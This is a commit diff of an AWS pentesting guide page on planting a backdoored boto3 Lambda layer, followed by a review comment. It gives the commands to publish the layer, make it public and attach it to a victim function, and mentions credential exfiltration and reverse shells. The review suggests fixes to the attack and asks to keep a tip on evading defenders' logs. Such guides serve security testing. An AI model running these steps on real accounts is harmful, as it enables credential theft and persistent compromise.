GITBOOK-581: change request with no subject merged in GitBook
carlospolop authored and gitbook-bot committed Feb 26, 2024
1 parent 072e564 commit 0bb2236
Showing 1 changed file with 15 additions and 16 deletions.
Expand Up @@ -235,40 +235,39 @@ For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position

#### Exploitation

**Attaching a layer to a function** only requires the `lambda:UpdateFunctionConfiguration` permission and **layers can be shared cross-account**. We also would need to know **what libraries they are using**, so we can override them correctly, but in this example, we’ll just **assume the attacked function is importing boto3**.
It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there.

Just to be safe, we’re going to use Pip to install the same version of the boto3 library from the Lambda runtime that we are targeting (Python 3.7), just so there is nothing different that might cause problems in the target function. That runtime currently uses boto3 version 1.9.42.

With the following code, we’ll install boto3 version 1.9.42 and its dependencies to a local "lambda\_layer" folder:
For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library:

```
pip3 install -t ./lambda_layer boto3==1.9.42
pip3 install -t ./lambda_layer boto3
```

Next, we will open `/lambda_layer/boto3/__init__.py` and add the malicious code. The payload we will be adding looks like this:

![](<../../../.gitbook/assets/image (26).png>)
You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example).

`requests` is being imported from `botocore`. The function will exfiltrate en env variables, and the try-except and 0.1 timeout are there to ensure this code doesn't break anything.
Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\
Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:**

{% hint style="info" %}
**Important note:** You should no longer `from botocore.vendored import requests` in real pentests, because a “DeprecationWarning” will be printed to the CloudWatch logs of that function, which will likely cause you to get caught by a defender.
{% endhint %}
{% code overflow="wrap" %}
```bash
aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
```
{% endcode %}

Now, bundle that code into a **ZIP file** and **upload** it to a **new Lambda layer in the ATTACKER account**. You will need to create a “python” folder first and put your libraries in there so that once we upload it to Lambda, the code will be found at “/opt/python/boto3”. Also, make sure that the layer is compatible with Python 3.7 and that the **layer is in the same region as our target function**. Once that’s done, we’ll use `lambda:AddLayerVersionPermission` to **make the layer publicly accessible** so that our target account can use it. Use your personal AWS credentials for this API call.
Now, make the uploaded lambda layer **accessible by any account**:

```bash
aws lambda add-layer-version-permission --layer-name boto3 \
--version-number 1 --statement-id public \
--action lambda:GetLayerVersion --principal *
```

Now with the **compromised credentials** we have, we will run the following command on our target Lambda function “s3-getter”, which will **attach our cross-account Lambda layer**.
And attach the lambda layer to the victim lambda function:

```bash
aws lambda update-function-configuration \
--function-name s3-getter \
--layers arn:aws:lambda:REGION:OUR-ACCOUNT-ID:layer:boto3:1 \
--function-name <func-name> \
--layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
--timeout 300 #5min for rev shells
```
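Review bot: The rewrite drops the boto3 version pin (`pip3 install -t ./lambda_layer boto3`) but the new `publish-layer-version` command still advertises `--compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"`; the removed text pinned `boto3==1.9.42` precisely so the layer matched the target runtime and "nothing different ... might cause problems", and an unpinned install from the operator's host pip gives no such guarantee for the older runtimes listed. Either keep a pin matching the boto3 version of the runtime being targeted, or restrict `--compatible-runtimes` to the version the layer was actually built for. Related gap in the same hunk: the prose says "you need to create a python folder and put the libraries in there to override /opt/python/boto3", but the install goes into `./lambda_layer` and `backdoor.zip` then appears in the command with no step producing it; a line such as `mkdir python && cp -r lambda_layer/* python/ && zip -r backdoor.zip python` before the `publish-layer-version` call would close that hole. Finally, the removed hint about `from botocore.vendored import requests` writing a DeprecationWarning to the function's CloudWatch logs was an opsec caveat that the new text no longer carries anywhere; consider keeping it next to "add the backdoor in the global code".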

